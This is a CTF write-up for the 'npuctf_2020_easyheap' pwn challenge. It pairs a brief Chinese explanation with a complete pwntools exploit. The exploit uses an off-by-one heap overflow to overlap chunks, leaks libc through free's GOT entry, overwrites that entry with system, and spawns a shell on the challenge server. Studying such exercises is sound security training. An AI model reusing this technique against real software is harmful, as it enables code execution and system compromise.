npuctf_2020_easyheap
查看保护
2.27下的off-by-one。overlapping改指针为got,泄露出libc之后直接edit这个got为system即可。off-by-one具体看z1r0’s blog
from pwn import *
context(arch='amd64', os='linux', log_level='debug')
# NOTE(review): the script mixes str and bytes when talking to the tube
# (e.g. 'aaaa' vs b'a' * 0x18); recent pwntools encodes str with a warning,
# older py2 setups treat them as the same — confirm against the interpreter used.
file_name = './z1r0'
# debug=1 selects the remote instance; 0 runs the local binary instead.
debug = 1
if debug:
    r = remote('node4.buuoj.cn', 29274)
else:
    r = process(file_name)
# Parsed on-disk ELF of the target; used below for its GOT entries.
elf = ELF(file_name)
def dbg():
    """Attach gdb to the tube `r` (a manual debugging aid; not called by the script)."""
    gdb.attach(r)
# Prompt the helpers below wait for before sending a menu choice.
menu = 'Your choice :'
def add(size, content):
    """Drive menu option 1: answer the size prompt with `size`, then send `content`.

    `size` is sent as its decimal string; `content` is sent verbatim with no
    trailing newline, so the caller decides the exact bytes delivered.
    """
    answers = (
        (menu, '1'),
        ('Size of Heap(0x10 or 0x20 only) : ', str(size)),
    )
    for prompt, reply in answers:
        r.sendlineafter(prompt, reply)
    r.sendafter('Content:', content)
def edit(index, content):
    """Drive menu option 2: select entry `index`, then send `content` verbatim.

    `content` goes out without a newline, so payload bytes arrive exactly as given.
    """
    choice, idx = '2', str(index)
    r.sendlineafter(menu, choice)
    r.sendlineafter('Index :', idx)
    r.sendafter('Content: ', content)
def delete(index):
    """Drive menu option 4 for entry `index`."""
    for prompt, reply in ((menu, '4'), ('Index :', str(index))):
        r.sendlineafter(prompt, reply)
def show(index):
    """Drive menu option 3 for entry `index`; the caller reads the reply from `r`."""
    steps = [(menu, '3'), ('Index :', str(index))]
    for prompt, reply in steps:
        r.sendlineafter(prompt, reply)
# Three 0x18-byte entries at indices 0, 1 and 2; index 2 holds the
# "/bin/sh\x00" string that the final delete() call relies on.
add(0x18, 'aaaa') #0
add(0x18, 'bbbb') #1
add(0x18, '/bin/sh\x00') #2
# 0x18 bytes of filler plus one extra byte (0x41) written through index 0:
# this single out-of-bounds byte is the off-by-one the page summary refers to.
p1 = b'a' * 0x18 + b'\x41'
edit(0, p1)
delete(1)
# Address of free's GOT slot, taken from the ELF on disk (independent of the leak).
free_got = elf.got['free']
# 0x38-byte payload: 0x10 filler, then 0, 0x21, 0x38 and the GOT address.
# The page summary describes this as the overlapping write that turns an
# entry's pointer into the GOT address.
p2 = b'a' * 0x10 + p64(0) + p64(0x21) + p64(0x38) + p64(free_got)
add(0x38, p2)
# Entry 1 now points at the GOT, so its contents reveal free's runtime address.
show(1)
# Keep the six bytes ending at the first 0x7f and zero-extend them to 8 bytes.
free_addr = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))
success('free_addr = ' + hex(free_addr))
# libc-2.27.so is loaded from the working directory and used only for symbol offsets.
libc = ELF('libc-2.27.so')
libc_base = free_addr - libc.sym['free']
system_addr = libc_base + libc.sym['system']
# Overwrite the GOT slot (via entry 1) with system's address ...
p3 = p64(system_addr)
edit(1, p3)
# ... so that freeing entry 2 ("/bin/sh") calls system instead.
delete(2)
r.interactive()